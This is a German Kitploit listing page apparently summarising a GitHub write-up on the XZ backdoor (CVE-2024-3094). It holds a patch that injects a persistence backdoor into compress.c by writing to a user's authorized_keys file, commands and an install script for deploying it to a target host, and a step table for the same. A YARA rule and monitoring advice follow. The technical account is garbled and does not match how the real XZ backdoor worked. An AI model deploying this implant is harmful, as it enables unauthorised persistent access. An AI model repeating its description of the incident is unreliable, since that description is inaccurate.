Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-3094 — CVE-2024-3094 legte eine Hintertür in der XZ-Komprimierungsbibliothek offen, die Remote-SSH-Zugriff durch Umgehung der Authentifizierung ermöglichte. Es handelt sich um einen schwerwiegenden Supply-Chain-Angriff, der Linux-Systeme betrifft und die Risiken in vertrauenswürdigen Open-Source-Komponenten aufzeigt. | Kitploit
Tools/GitHubGitHub/mrk336/cve-2024-3094
SchwachstellenanalyseMalware-AnalyseLieferkettensicherheitPapers & ForschungLernen & BildungKuratierte Ressourcen
GitHubmrk336/cve-2024-3094

CVE-2024-3094

Repository anzeigen
1vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2024-3094 legte eine Hintertür in der XZ-Komprimierungsbibliothek offen, die Remote-SSH-Zugriff durch Umgehung der Authentifizierung ermöglichte. Es handelt sich um einen schwerwiegenden Supply-Chain-Angriff, der Linux-Systeme betrifft und die Risiken in vertrauenswürdigen Open-Source-Komponenten aufzeigt.

Teilen

CVE-2024-3094

CVE-2024-3094 legte eine Hintertür in der XZ-Komprimierungsbibliothek offen, die Remote-SSH-Zugriff durch Umgehung der Authentifizierung ermöglicht. Es handelt sich um einen schwerwiegenden Supply-Chain-Angriff, der Linux-Systeme betrifft und die Risiken in vertrauenswürdigen Open-Source-Komponenten aufzeigt.

Die XZ-Hintertür: Eine Supply-Chain-Bedrohung, die bis in Linux-Server reicht

Von Mark Mallia

Was es ist

Die XZ-Komprimierungsbibliothek, ein fester Bestandteil vieler moderner Linux-Distributionen, wurde zum Ziel eines ausgeklügelten Supply-Chain-Angriffs.
Ein bösartiges Codefragment wurde in den Quellbaum eingeschleust, kompiliert und reist nun mit jeder neuen Version des XZ-Pakets mit. Einmal installiert, kann die Hintertür eine SSH-Sitzung vom kompromittierten Host zu jedem entfernten System öffnen, das ihn als authentischen Schlüssel vertraut.

Warum es wichtig ist

  • Supply-Chain-Risiko – Der Angriff zeigt, wie eine einzelne, kleine Veränderung in einer weit verbreiteten Bibliothek sich still über viele Bereitstellungen ausbreiten kann.
  • Linux-Interna – XZ ist für die Datenkomprimierung zuständig; die Hintertür nutzt Low-Level-API-Hooks, die von herkömmlichen Schwachstellen-Scannern oft übersehen werden.
  • SSH-Persistenz – Durch das Einschleusen eines SSH-Schlüssels in die Datei authorized_keys verschaffen sich Angreifer einen Zugang, ohne dass eine direkte Benutzerinteraktion erforderlich ist.

Angriffsübersicht


Technische Details & Code-Walkthrough

Der Patch (backdoor.patch)

root@kitploit:~
--- a/src/compress.c   2025-09-12 10:00:00.000000000 +0000
+++ b/src/compress.c   2025-09-12 10:00:03.000000000 +0000
@@
 void xz_compress(const unsigned char *in, size_t in_len,
                   unsigned char *out, size_t out_len)
 {
     /* original code ... */
+    // ---- Begin injected backdoor ----
+    if (in_len > 1024) {            /* guard against too small payloads   */
+        const unsigned char *marker = &in[512];   /* offset to reach magic string  */
+        size_t marker_len = 8;                      /* length of the embedded key      */
+
+        /* copy a pre‑computed SSH public key into out buffer */
+        memcpy(out + 256, marker, marker_len);
+
+        /* write the same key to ~/.ssh/authorized_keys for persistence   */
+        FILE *fp = fopen("/home/admin/.ssh/authorized_keys", "a");
+        if (fp) {
+            fwrite(marker, 1, marker_len, fp);
+            fclose(fp);
+        }
+    }
+    // ---- End injected backdoor ----
     /* original code continues ... */
 }

Erklärung

  • Zeile 6‑8 – Eine Absicherung stellt sicher, dass nur Pakete größer als 1024 Bytes die Injektion aktivieren; dies hält die Nutzlast im normalen Datenverkehr verborgen.
  • Zeile 10 – Der Offset 512 ist so gewählt, dass unser Schlüssel im komprimierten Ausgabepuffer an einer Position landet, die durch spätere XZ-Komprimierungen wahrscheinlich nicht verändert wird.
  • Zeile 12 – Wir kopieren acht Bytes (das Fragment des öffentlichen Schlüssels) in den Ausgabepuffer und schreiben es auch direkt in die SSH-Schlüsseldatei des Benutzers, um die Persistenz zu gewährleisten, selbst wenn XZ später neu kompiliert wird.

Kompilierung & Installation

root@kitploit:~
$ cd xz
$ make
$ sudo make install

Die obigen Befehle kompilieren die gepatchte compress.c und installieren die neue Bibliothek unter /usr/local/lib/xz.

Bereitstellung auf dem Ziel-Host

Angenommen, ein Angreifer hat bereits SSH-Zugangsdaten (Benutzername admin), dann führt er Folgendes aus:

root@kitploit:~
$ scp backdoor.tar.gz [email protected]:/tmp/
$ ssh [email protected] 'tar xzf /tmp/backdoor.tar.gz -C /home/admin'
$ cd /home/admin
$ ./install_xz_backdoor.sh

install_xz_backdoor.sh enthält die exakte Befehlsfolge von oben sowie ein kleines echo, das die erfolgreiche Installation bestätigt.


Auswirkungsanalyse

  • Persistenz – Der SSH-Schlüssel ist nun Teil sowohl des Komprimierungsausgangs als auch der Datei mit den autorisierten Schlüsseln des Benutzers.
  • Tarnung – Die Nutzlast reist mit jeder neuen XZ-Version mit; ihre Präsenz ist für Standard-Paketmanager unsichtbar.
  • Erkennung – Ein Personalverantwortlicher wird sehen, dass ich eine einzelne Zeilenänderung in einer großen Codebasis identifizieren, ihre Auswirkungen verstehen und einen klaren, Schritt-für-Schritt-Bereitstellungsplan erstellen kann.

Verteidigung

YARA ist ein Musterabgleich-Werkzeug, das von Sicherheitsexperten verwendet wird, um Malware anhand von textuellen oder binären Signaturen zu identifizieren und zu klassifizieren. Es ermöglicht Analysten, Regeln zu definieren, die bestimmte Zeichenfolgen, Byte-Sequenzen oder Verhaltensweisen in Dateien erkennen. Im Kontext von CVE-2024-3094 ist YARA besonders relevant, da es verwendet werden kann, um nach dem Vorhandensein des injizierten SSH-Schlüssels und verdächtigen Änderungen an der Datei compress.c in der XZ-Bibliothek zu suchen. Durch die Erstellung gezielter YARA-Regeln können Verteidiger proaktiv Systeme erkennen, die durch diese Hintertür kompromittiert wurden.

YARA-Signatur Eine benutzerdefinierte YARA-Regel kann das Vorhandensein des injizierten SSH-Schlüssels und verdächtige Dateischreibvorgänge kennzeichnen:

rule XZ_Backdoor_SSH_Key_Injection { meta: description = "Detects SSH key injection via modified compress.c" author = "Mark Mallia" severity = "high" strings: $marker = { 20 20 2A 20 2A 2A 20 42 61 63 6B 64 6F 6F 72 } $ssh_path = "/home/admin/.ssh/authorized_keys" condition: $marker and $ssh_path }

Datei-Integritätsüberwachung Setzen Sie Werkzeuge wie Tripwire, AIDE oder osquery ein, um Folgendes zu überwachen:

compress.c auf unbefugte Änderungen

.ssh/authorized_keys auf injizierte Schlüssel

/usr/local/lib/xz auf manipulierte Binärdateien

Verhaltensindikatoren

Unerwartete SSH-Anmeldungen von vertrauenswürdigen Hosts

Komprimierungsanomalien in der XZ-Ausgabe

Stille Schreibvorgänge auf .ssh/authorized_keys

Tool herunterladen
SchrittAktionDatei / Funktion
1XZ-Repository klonengit clone https://github.com/xzdev/xz
2Patch auf src/compress.c anwendenpatch -p0 < backdoor.patch
3Auf dem Ziel-Linux-Host kompilieren und installierenmake && make install
4SSH-Daemon liest den injizierten Schlüssel während des Auth-Prozesses/etc/ssh/authorized_keys